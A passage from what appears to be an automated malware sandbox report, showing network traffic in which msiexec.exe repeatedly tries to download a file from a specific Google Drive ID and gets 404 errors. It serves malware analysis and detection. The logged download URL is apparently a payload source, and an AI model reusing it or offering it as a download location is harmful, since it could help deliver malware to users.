                                                          Jan 11, 2025 01:31:35.596813917 CET44350017142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:35.596843958 CET50017443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:35.596888065 CET50017443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:35.597448111 CET50017443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:35.597462893 CET44350017142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:35.722758055 CET50018443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:35.722801924 CET44350018142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:35.722872972 CET50018443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:35.723304987 CET50018443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:35.723320007 CET44350018142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:36.360493898 CET44350018142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:36.360568047 CET50018443192.168.2.9142.250.184.206

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 11, 2025 01:30:43.512227058 CET5772853192.168.2.91.1.1.1
                                                          Jan 11, 2025 01:30:43.518968105 CET53577281.1.1.1192.168.2.9
                                                          Jan 11, 2025 01:30:44.616436958 CET5301753192.168.2.91.1.1.1
                                                          Jan 11, 2025 01:30:44.623703957 CET53530171.1.1.1192.168.2.9

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 11, 2025 01:30:43.512227058 CET192.168.2.91.1.1.10xac25Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:30:44.616436958 CET192.168.2.91.1.1.10x13eStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 11, 2025 01:29:28.205841064 CET1.1.1.1192.168.2.90xdf17No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 01:29:28.205841064 CET1.1.1.1192.168.2.90xdf17No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:30:43.518968105 CET1.1.1.1192.168.2.90xac25No error (0)drive.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:30:44.623703957 CET1.1.1.1192.168.2.90x13eNo error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • drive.google.com
                                                          • drive.usercontent.google.com

                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.949974142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:30:44 UTC216OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          2025-01-11 00:30:44 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:44 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: script-src 'nonce-BN0J13Xalg0gfSYRyJ89JQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.949975142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:30:45 UTC258OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          2025-01-11 00:30:45 UTC2218INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgRVnzEkubO4dxbA2c_lHNNHU3gkwu5Z3a1mx4YHq7MsJCThrEt1Ygk9IlRJd0sRz5pP
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:45 GMT
                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-O8EOhVgXzqVX_3tCzStGeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Set-Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY; expires=Sun, 13-Jul-2025 00:30:45 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:30:45 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 56 5f 47 56 33 55 53 47 51 34 46 4b 35 6f 57 46 6d 30 32 53 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hV_GV3USGQ4FK5oWFm02Sw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.949976142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:30:46 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:46 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:46 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-QW0iLIhqJ2KHitvxYieqiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.949977142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:30:47 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:47 UTC1851INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgSLAr3O-4BZf2vsFb4atsWpQh4euFalnzgm2yvrI01h8FRfh-TqMt56uXAcroKt4cLvKcAJvOM
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:47 GMT
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-3CsUnk7pfy73n0TI3cRNAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:30:47 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 37 6c 33 49 38 4a 46 50 63 7a 44 32 30 6c 32 63 6c 46 52 69 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="E7l3I8JFPczD20l2clFRiQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.949978142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:30:48 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:49 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:48 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-rZCgaB8HBBaTpFFhHQ76Wg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.949979142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:30:49 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:50 UTC1844INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgTthHzghFAjLo31iEBd0f8rL1r9I933PHGhW0XWEfQngDfehJsponJQcV6GRYOly3lq
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:50 GMT
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-q-qoYC80koCl7JdYDmO4RQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:30:50 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 75 51 49 61 56 69 73 47 79 76 6a 32 4b 34 37 42 42 79 66 66 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1uQIaVisGyvj2K47BByffw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.949980142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:30:51 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:51 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:51 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-df7W7LxxKEjPeBIyq4LHMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.949981142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:30:52 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
